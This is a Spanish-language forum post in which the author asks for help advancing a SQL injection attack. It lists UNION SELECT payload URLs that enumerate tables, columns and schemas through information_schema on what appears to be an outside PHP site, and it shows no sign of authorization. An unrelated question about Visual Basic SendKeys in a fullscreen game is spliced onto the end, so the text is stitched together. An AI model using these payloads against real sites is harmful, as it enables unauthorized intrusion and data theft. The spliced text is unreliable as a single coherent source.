Buenas, me estoy documentando sobre inyecciones SQL. He seguido varios manuales, pero llevo todo el dia atascado en un punto. Asique os pongo los pasos que he seguido, y os pido consejo:

He conseguido obtener el nombre de todas las tablas de la BD:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28table_name%29,4,5,6,7,8,9+from+information_schema.tables--

Sin embargo la consulta que deberia devolver las columnas solo muestra las columnas por defecto de information_schema:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28column_name%29,6,5,6,7,8,9+from+information_schema.columns--

si compruebo las bases de datos que hay, solo veo information_schema y dbro
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28schema_name%29,database%28%29,5,6,7,8,9+from+information_schema.schemata--

con lo cual deduzco que no tengo permisos para ver la BD mysql. Tambien he estado haciendo consultas a ciegas intentando adivinar las columnas de una tabla pero no ha habido suerte:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28id%29,6,5,6,7,8,9+from+dbro.cartas--

ENTOCES: Mi pregunta es... Puedo conseguir mas informacion de la BD o llegué a un punto muerto?

El sendkeys de basic siempre me ha funcionado sin problemas, pero hoy he intentado usarlo en un programa a pantalla completa (un juego) y sencillamente no ha pasado nada.

Alguna idea?
Por aqui os dejo el codigo que use de prueba.